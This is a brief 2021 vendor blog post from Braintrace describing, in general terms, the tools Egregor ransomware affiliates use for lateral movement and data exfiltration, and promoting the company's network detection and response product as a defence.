Braintrace’s take on the Egregor Ransomware and How to Defend Against it

By John Limb, CTO at Braintrace
Jan 19, 2021 8:02 am ET

The FBI assesses Egregor ransomware is operating as a Ransomware as a Service Model. In this model, multiple different individuals play a part in conducting a single intrusion and ransomware event. Because of the large number of actors involved in deploying Egregor, the tactics, techniques, and procedures (TTPs) used in its deployment can vary widely, creating significant challenges for defense and mitigation.

As Braintrace reported in its December white paper “The Path to Ransomware,” Egregor is similar to most ransomware attacks. Once Egregor gains access to the network, Egregor ransomware affiliates use common pen testing and exploit tools like Cobalt Strike, Qakbot/Qbot, Advanced IP Scanner, and AdFind to escalate privileges and move laterally across a network. It uses tools like Rclone (sometimes renamed or hidden as svchost) and 7zip to exfiltrate data.

The best way to prevent Egregor ransomware attacks is to identify these exploitation tools before they have the chance to cause damage. Braintrace’s Dragonfly NDR product can detect early network traffic associated with the exploit tools and alert to such activity. Making use of proprietary deep learning models, specifically our Encrypted Payload Analytics (EPA) and Domain Generation Algorithm (DGA) detection engines, Dragonfly alerts to early command & control (C2) communications, triggering expanded detection and response (XDR) capabilities to engage endpoint applications to quarantine or clean the device before it can move further laterally throughout the network.

To learn more about Braintrace’s complete XDR or NDR solutions, please send a request to